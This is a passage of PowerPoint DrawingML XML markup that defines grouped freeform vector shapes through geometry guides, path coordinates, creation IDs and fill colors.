                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0477B75-4E8E-441E-9006-633311104AF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4020" y="908"/>
                      <a:ext cx="28" cy="892"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 59"/>
                        <a:gd name="T1" fmla="*/ 1873 h 1887"/>
                        <a:gd name="T2" fmla="*/ 0 w 59"/>
                        <a:gd name="T3" fmla="*/ 0 h 1887"/>
                        <a:gd name="T4" fmla="*/ 59 w 59"/>
                        <a:gd name="T5" fmla="*/ 9 h 1887"/>
                        <a:gd name="T6" fmla="*/ 59 w 59"/>
                        <a:gd name="T7" fmla="*/ 1887 h 1887"/>
                        <a:gd name="T8" fmla="*/ 0 w 59"/>
                        <a:gd name="T9" fmla="*/ 1873 h 188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9" h="1887">
                          <a:moveTo>
                            <a:pt x="0" y="1873"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="59" y="9"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="59" y="1887"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1873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95" name="Freeform 2139">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84D5AE1A-C7DF-4B07-B220-A2E0D41434C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4048" y="1579"/>
                      <a:ext cx="160" cy="70"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 338"/>
                        <a:gd name="T1" fmla="*/ 0 h 149"/>
                        <a:gd name="T2" fmla="*/ 338 w 338"/>
                        <a:gd name="T3" fmla="*/ 93 h 149"/>
                        <a:gd name="T4" fmla="*/ 338 w 338"/>
                        <a:gd name="T5" fmla="*/ 149 h 149"/>
                        <a:gd name="T6" fmla="*/ 0 w 338"/>
                        <a:gd name="T7" fmla="*/ 59 h 149"/>
                        <a:gd name="T8" fmla="*/ 0 w 338"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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38" h="149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="338" y="93"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="338" y="149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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96" name="Freeform 2140">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ED9CF09-287D-43E6-8FA7-52584D2A62A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4048" y="1358"/>
                      <a:ext cx="160" cy="70"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 338"/>
                        <a:gd name="T1" fmla="*/ 0 h 149"/>
                        <a:gd name="T2" fmla="*/ 338 w 338"/>
                        <a:gd name="T3" fmla="*/ 89 h 149"/>
                        <a:gd name="T4" fmla="*/ 338 w 338"/>
                        <a:gd name="T5" fmla="*/ 149 h 149"/>
                        <a:gd name="T6" fmla="*/ 0 w 338"/>
                        <a:gd name="T7" fmla="*/ 59 h 149"/>
                        <a:gd name="T8" fmla="*/ 0 w 338"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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38" h="149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="338" y="89"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="338" y="149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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97" name="Freeform 2141">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55A0A47D-E863-42E0-BA36-B0BA78AA6A8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4048" y="1137"/>
                      <a:ext cx="160" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 338"/>
                        <a:gd name="T1" fmla="*/ 0 h 151"/>
                        <a:gd name="T2" fmla="*/ 338 w 338"/>
                        <a:gd name="T3" fmla="*/ 92 h 151"/>
                        <a:gd name="T4" fmla="*/ 338 w 338"/>
                        <a:gd name="T5" fmla="*/ 151 h 151"/>
                        <a:gd name="T6" fmla="*/ 0 w 338"/>
                        <a:gd name="T7" fmla="*/ 59 h 151"/>
                        <a:gd name="T8" fmla="*/ 0 w 338"/>
                        <a:gd name="T9" fmla="*/ 0 h 15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38" h="151">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="338" y="92"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="338" y="151"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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98" name="Freeform 2142">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5414BD08-0FFD-4F91-8724-D98C6583DA3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4020" y="880"/>
                      <a:ext cx="322" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 681"/>
                        <a:gd name="T1" fmla="*/ 59 h 182"/>
                        <a:gd name="T2" fmla="*/ 227 w 681"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 681 w 681"/>
                        <a:gd name="T5" fmla="*/ 120 h 182"/>
                        <a:gd name="T6" fmla="*/ 454 w 681"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 681"/>
                        <a:gd name="T9" fmla="*/ 59 h 1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1" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="59"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="681" y="120"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="454" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59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99" name="Freeform 2143">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{469A96C9-6ECB-47D3-B0BA-90D7E1F8A91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4048" y="915"/>
                      <a:ext cx="160" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 338"/>
                        <a:gd name="T1" fmla="*/ 0 h 149"/>
                        <a:gd name="T2" fmla="*/ 338 w 338"/>
                        <a:gd name="T3" fmla="*/ 90 h 149"/>
                        <a:gd name="T4" fmla="*/ 338 w 338"/>
                        <a:gd name="T5" fmla="*/ 149 h 149"/>
                        <a:gd name="T6" fmla="*/ 0 w 338"/>
                        <a:gd name="T7" fmla="*/ 59 h 149"/>
                        <a:gd name="T8" fmla="*/ 0 w 338"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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38" h="149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="338" y="90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="338" y="149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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00" name="Freeform 2144">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1403833F-7BEB-4055-ADCC-7709322EEF0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4048" y="1772"/>
                      <a:ext cx="160" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 338"/>
                        <a:gd name="T1" fmla="*/ 0 h 151"/>
                        <a:gd name="T2" fmla="*/ 338 w 338"/>
                        <a:gd name="T3" fmla="*/ 92 h 151"/>
                        <a:gd name="T4" fmla="*/ 338 w 338"/>
                        <a:gd name="T5" fmla="*/ 151 h 151"/>
                        <a:gd name="T6" fmla="*/ 0 w 338"/>
                        <a:gd name="T7" fmla="*/ 59 h 151"/>
                        <a:gd name="T8" fmla="*/ 0 w 338"/>
                        <a:gd name="T9" fmla="*/ 0 h 15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38" h="151">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="338" y="92"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="338" y="151"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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01" name="Freeform 2145">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41273A75-03E5-4072-8A05-1F7428AC12C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4235" y="937"/>
                      <a:ext cx="107" cy="913"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 227 w 227"/>
                        <a:gd name="T1" fmla="*/ 0 h 1932"/>
                        <a:gd name="T2" fmla="*/ 0 w 227"/>
                        <a:gd name="T3" fmla="*/ 62 h 1932"/>
                        <a:gd name="T4" fmla="*/ 0 w 227"/>
                        <a:gd name="T5" fmla="*/ 1932 h 1932"/>
                        <a:gd name="T6" fmla="*/ 227 w 227"/>
                        <a:gd name="T7" fmla="*/ 1873 h 1932"/>
                        <a:gd name="T8" fmla="*/ 227 w 227"/>
                        <a:gd name="T9" fmla="*/ 0 h 19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27" h="1932">
                          <a:moveTo>
                            <a:pt x="227" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="62"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1932"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="1873"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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337" name="Group 2146">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83FFB491-4DCE-40D5-A578-4E3F1915F3C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29" y="2236"/>
                    <a:ext cx="323" cy="751"/>
                    <a:chOff x="3597" y="1015"/>
                    <a:chExt cx="323" cy="751"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2376" name="Freeform 2147">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4540C42-8C2A-4D51-BEC9-B17B20B7E6F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597" y="1015"/>
                      <a:ext cx="107" cy="694"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 226 w 226"/>
                        <a:gd name="T1" fmla="*/ 0 h 1464"/>
                        <a:gd name="T2" fmla="*/ 0 w 226"/>
                        <a:gd name="T3" fmla="*/ 61 h 1464"/>
                        <a:gd name="T4" fmla="*/ 0 w 226"/>
                        <a:gd name="T5" fmla="*/ 1464 h 1464"/>
                        <a:gd name="T6" fmla="*/ 226 w 226"/>
                        <a:gd name="T7" fmla="*/ 1403 h 1464"/>
                        <a:gd name="T8" fmla="*/ 226 w 226"/>
                        <a:gd name="T9" fmla="*/ 0 h 146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26" h="1464">
                          <a:moveTo>
                            <a:pt x="226" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="61"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1464"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="226" y="1403"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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77" name="Freeform 2148">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5398D97B-6DAD-4736-9AAD-33D8584718B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597" y="1652"/>
                      <a:ext cx="323" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 61 h 182"/>
                        <a:gd name="T2" fmla="*/ 226 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 123 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 61 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="61"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="61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78" name="Freeform 2149">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F564856E-B75C-4543-86F9-6A90EA137A5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597" y="1236"/>
                      <a:ext cx="323" cy="87"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 59 h 182"/>
                        <a:gd name="T2" fmla="*/ 226 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 121 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 59 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="59"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="121"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="59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79" name="Freeform 2150">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E17FE6CF-BF52-449A-83C6-1B8B4C207FA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597" y="1015"/>
                      <a:ext cx="323" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 61 h 182"/>
                        <a:gd name="T2" fmla="*/ 226 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 123 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 61 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="61"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="123"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="61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80" name="Freeform 2151">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{508562AB-08AD-4546-9D03-40C6CFEC4BA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597" y="1458"/>
                      <a:ext cx="323" cy="86"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 680"/>
                        <a:gd name="T1" fmla="*/ 62 h 182"/>
                        <a:gd name="T2" fmla="*/ 226 w 680"/>
                        <a:gd name="T3" fmla="*/ 0 h 182"/>
                        <a:gd name="T4" fmla="*/ 680 w 680"/>
                        <a:gd name="T5" fmla="*/ 121 h 182"/>
                        <a:gd name="T6" fmla="*/ 453 w 680"/>
                        <a:gd name="T7" fmla="*/ 182 h 182"/>
                        <a:gd name="T8" fmla="*/ 0 w 680"/>
                        <a:gd name="T9" fmla="*/ 62 h 1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0" h="182">
                          <a:moveTo>
                            <a:pt x="0" y="62"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="226" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="680" y="121"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="453" y="182"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="62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81" name="Freeform 2152">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{485409DB-550D-4CB7-8B32-EBABD0435B1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785" y="1094"/>
                      <a:ext cx="27" cy="672"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 57"/>
                        <a:gd name="T1" fmla="*/ 1404 h 1418"/>
                        <a:gd name="T2" fmla="*/ 0 w 57"/>
                        <a:gd name="T3" fmla="*/ 0 h 1418"/>
                        <a:gd name="T4" fmla="*/ 57 w 57"/>
                        <a:gd name="T5" fmla="*/ 15 h 1418"/>
                        <a:gd name="T6" fmla="*/ 57 w 57"/>
                        <a:gd name="T7" fmla="*/ 1418 h 1418"/>
                        <a:gd name="T8" fmla="*/ 0 w 57"/>
                        <a:gd name="T9" fmla="*/ 1404 h 141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1418">
                          <a:moveTo>
                            <a:pt x="0" y="1404"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="15"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="57" y="1418"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1404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82" name="Freeform 2153">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93E48B87-35BD-482E-8CAA-5AE2FCD664A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597" y="1044"/>
                      <a:ext cx="27" cy="671"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 56"/>
                        <a:gd name="T1" fmla="*/ 1403 h 1417"/>
                        <a:gd name="T2" fmla="*/ 0 w 56"/>
                        <a:gd name="T3" fmla="*/ 0 h 1417"/>
                        <a:gd name="T4" fmla="*/ 56 w 56"/>
                        <a:gd name="T5" fmla="*/ 14 h 1417"/>
                        <a:gd name="T6" fmla="*/ 56 w 56"/>
                        <a:gd name="T7" fmla="*/ 1417 h 1417"/>
                        <a:gd name="T8" fmla="*/ 0 w 56"/>
                        <a:gd name="T9" fmla="*/ 1403 h 141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6" h="1417">
                          <a:moveTo>
                            <a:pt x="0" y="1403"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="0"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="56" y="14"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="56" y="1417"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1403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83" name="Freeform 2154">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A36D718-2001-419A-8271-D288DF3333F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624" y="1494"/>
                      <a:ext cx="161" cy="70"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 148"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 89 h 148"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 148 h 148"/>
                        <a:gd name="T6" fmla="*/ 0 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 148"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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40" h="148">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="89"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="148"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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84" name="Freeform 2155">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC5E128C-120E-4EFA-92C9-5B0CE243B89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624" y="1272"/>
                      <a:ext cx="161" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 149"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 90 h 149"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 149 h 149"/>
                        <a:gd name="T6" fmla="*/ 0 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 149"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 14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40" h="149">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="90"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="149"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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85" name="Freeform 2156">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AEBCE78F-4967-4289-8CB7-ED976C3BFE3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624" y="1051"/>
                      <a:ext cx="161" cy="71"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 151"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 92 h 151"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 151 h 151"/>
                        <a:gd name="T6" fmla="*/ 0 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 151"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 15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40" h="151">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="92"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="151"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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86" name="Freeform 2157">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA255E2C-9E4C-48C4-8A16-F29A5408AA0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624" y="1687"/>
                      <a:ext cx="161" cy="72"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 0 w 340"/>
                        <a:gd name="T1" fmla="*/ 0 h 152"/>
                        <a:gd name="T2" fmla="*/ 340 w 340"/>
                        <a:gd name="T3" fmla="*/ 92 h 152"/>
                        <a:gd name="T4" fmla="*/ 340 w 340"/>
                        <a:gd name="T5" fmla="*/ 152 h 152"/>
                        <a:gd name="T6" fmla="*/ 0 w 340"/>
                        <a:gd name="T7" fmla="*/ 59 h 152"/>
                        <a:gd name="T8" fmla="*/ 0 w 340"/>
                        <a:gd name="T9" fmla="*/ 0 h 15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40" h="152">
                          <a:moveTo>
                            <a:pt x="0" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="340" y="92"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="340" y="152"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="5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87" name="Freeform 2158">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D0B1B58-0976-4BAB-A25B-3911D2CA506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812" y="1073"/>
                      <a:ext cx="108" cy="693"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 227 w 227"/>
                        <a:gd name="T1" fmla="*/ 0 h 1462"/>
                        <a:gd name="T2" fmla="*/ 0 w 227"/>
                        <a:gd name="T3" fmla="*/ 59 h 1462"/>
                        <a:gd name="T4" fmla="*/ 0 w 227"/>
                        <a:gd name="T5" fmla="*/ 1462 h 1462"/>
                        <a:gd name="T6" fmla="*/ 227 w 227"/>
                        <a:gd name="T7" fmla="*/ 1403 h 1462"/>
                        <a:gd name="T8" fmla="*/ 227 w 227"/>
                        <a:gd name="T9" fmla="*/ 0 h 146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27" h="1462">
                          <a:moveTo>
                            <a:pt x="227" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="59"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="1462"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="1403"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
                      <a:srgbClr val="303030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338" name="Group 2159">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58EC6910-0878-4E91-90D7-2AC871EFBEC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346" y="2517"/>
                    <a:ext cx="322" cy="529"/>
                    <a:chOff x="3183" y="1180"/>
                    <a:chExt cx="322" cy="529"/>
                  </a:xfrm>
                </p:grpSpPr>
                <p:sp>
                  <p:nvSpPr>
                    <p:cNvPr id="2366" name="Freeform 2160">
                      <a:extLst>
                        <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                          <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F7FC9A0-3D47-49D2-ABA9-052EEF6B1C6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183" y="1180"/>
                      <a:ext cx="107" cy="472"/>
                    </a:xfrm>
                    <a:custGeom>
                      <a:avLst/>
                      <a:gdLst>
                        <a:gd name="T0" fmla="*/ 227 w 227"/>
                        <a:gd name="T1" fmla="*/ 0 h 999"/>
                        <a:gd name="T2" fmla="*/ 0 w 227"/>
                        <a:gd name="T3" fmla="*/ 61 h 999"/>
                        <a:gd name="T4" fmla="*/ 0 w 227"/>
                        <a:gd name="T5" fmla="*/ 999 h 999"/>
                        <a:gd name="T6" fmla="*/ 227 w 227"/>
                        <a:gd name="T7" fmla="*/ 937 h 999"/>
                        <a:gd name="T8" fmla="*/ 227 w 227"/>
                        <a:gd name="T9" fmla="*/ 0 h 99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27" h="999">
                          <a:moveTo>
                            <a:pt x="227" y="0"/>
                          </a:moveTo>
                          <a:lnTo>
                            <a:pt x="0" y="61"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="0" y="999"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="937"/>
                          </a:lnTo>
                          <a:lnTo>
                            <a:pt x="227" y="0"/>
                          </a:lnTo>
                          <a:close/>
                        </a:path>
                      </a:pathLst>
                    </a:custGeom>
                    <a:solidFill>
